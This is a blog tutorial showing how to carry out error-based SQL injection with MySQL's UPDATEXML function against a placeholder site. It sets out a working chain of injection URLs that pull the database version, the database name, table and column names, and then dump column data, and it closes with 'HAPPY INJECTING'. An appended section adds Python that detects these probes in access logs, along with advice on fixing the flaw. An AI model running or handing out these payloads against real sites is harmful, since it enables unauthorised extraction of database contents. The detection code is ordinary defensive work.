
Wednesday 15 July 2015

XPATH Injection Using UPDATEXML



After the discussion about XPATH injection using ExtractValue, let's come to the next part. In this tutorial you will learn about XPATH injection using UPDATEXML.
Each site uses a different firewall to protect its database. Some sites have blocked the ExtractValue function, so there we can use XPATH injection with UPDATEXML instead.

Now let's start injecting manually. We are injecting a site and we execute our UNION-based query, but we do not get any output, so we will use XPATH injection there.
For example, here is our UNION-based query:

http://www.VulnSite.com/news.php?id=6 and 0 Union Select 1,2,3,4,5-- -

After executing this query we do not get any output, or sometimes we get this type of error:
"The used SELECT statements have a different number of columns"
So we will use XPATH injection to inject the database.
Let's try to get the version using XPATH injection with an UPDATEXML query.
Our XPATH query will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,version()),null)-- -

After executing the query we get this type of output:


XPATH syntax error: ':VERSION_HERE'

Now let's check the current database name. Our query for getting the current database will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,database()),null)-- -

And we get this output:
XPATH syntax error: ':CURRENT_DATABASE_NAME_HERE'

Now let's continue injecting to get the tables in the current database.
This will be our query for the tables:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),null)-- -

After executing the query we will get this output:

XPATH syntax error: ':SOME_TABLE_NAME_HERE'

As we are injecting with XPATH injection, we will increase the LIMIT to get the other tables in the current database.
After getting the tables from the current database, our next step is to get the columns from the tables.
Our query for getting columns will be:

http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(column_name) from information_schema.columns where table_name='OUR_TABLE_NAME_HERE' limit 0,1)),null)-- -

We will increase the LIMIT to get the other columns in the targeted table.
After getting the columns, the final part is to dump data from the columns.
Our final query will be:
http://www.VulnSite.com/news.php?id=6 and updatexml(null,concat(0x3a3a,(select concat(OUR_COLUMN_NAME_HERE) from OUR_TABLE_NAME_HERE)),null)-- -
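
Seen from the defending side, every request in this tutorial carries an updatexml( call inside the id parameter, and the result comes back as "XPATH syntax error" text in the page. The Python below is an added example, not part of the original post: it flags such requests in web server access logs and checks a response body for the leaked error. The log lines, function names and context labels are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from a real system); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jul/2015:10:00:01 +0000] "GET /news.php?id=6 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Jul/2015:10:00:09 +0000] "GET /news.php?id=6%20and%20updatexml(null,concat(0x3a3a,version()),null)--%20- HTTP/1.1" 200 612',
    '203.0.113.7 - - [15/Jul/2015:10:00:15 +0000] "GET /news.php?id=6+AND+UpdateXML(null,concat(0x3a3a,(select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1)),null)--+- HTTP/1.1" 200 640',
    '198.51.100.4 - - [15/Jul/2015:10:01:02 +0000] "GET /search.php?q=mysql+updatexml+manual HTTP/1.1" 200 2048',
]

# The two MySQL XML functions, matched only when used as a call (followed by "(").
XML_FUNC = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Extra signals that raise confidence when they share a parameter with the call.
CONTEXT = {
    "concat": re.compile(r"\bconcat\s*\(", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "server_function": re.compile(r"\b(?:version|database|user)\s*\(\s*\)", re.I),
    "comment_tail": re.compile(r"--\s"),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# Error text that reaches the page when database errors are shown to users.
LEAK = re.compile(r"XPATH syntax error: '([^']*)'")

def inspect_line(line):
    """Return a finding dict for one access-log line, or None if it looks clean."""
    m = REQUEST.search(line)
    if not m:
        return None
    # parse_qsl percent-decodes each value and turns "+" into a space.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        value = re.sub(r"\s+", " ", value)
        call = XML_FUNC.search(value)
        if call:
            hits = sorted(k for k, rx in CONTEXT.items() if rx.search(value))
            return {"param": name, "function": call.group(1).lower(), "context": hits}
    return None

def scan(lines):
    """Return (line_index, finding) for every suspicious line."""
    return [(i, f) for i, line in enumerate(lines) if (f := inspect_line(line))]

def leaked_error(body):
    """Return the text MySQL echoed inside an XPATH error, or None."""
    m = LEAK.search(body)
    return m.group(1) if m else None

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LOG):
        print(idx, finding)
```

Detection only tells you the parameter is being probed. The fix is to bind id as a query parameter in the application and to stop displaying database errors to visitors.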

HAPPY INJECTING !!!

AUTHOR: Rai Muzammal Hussain a.k.a RAi Jee

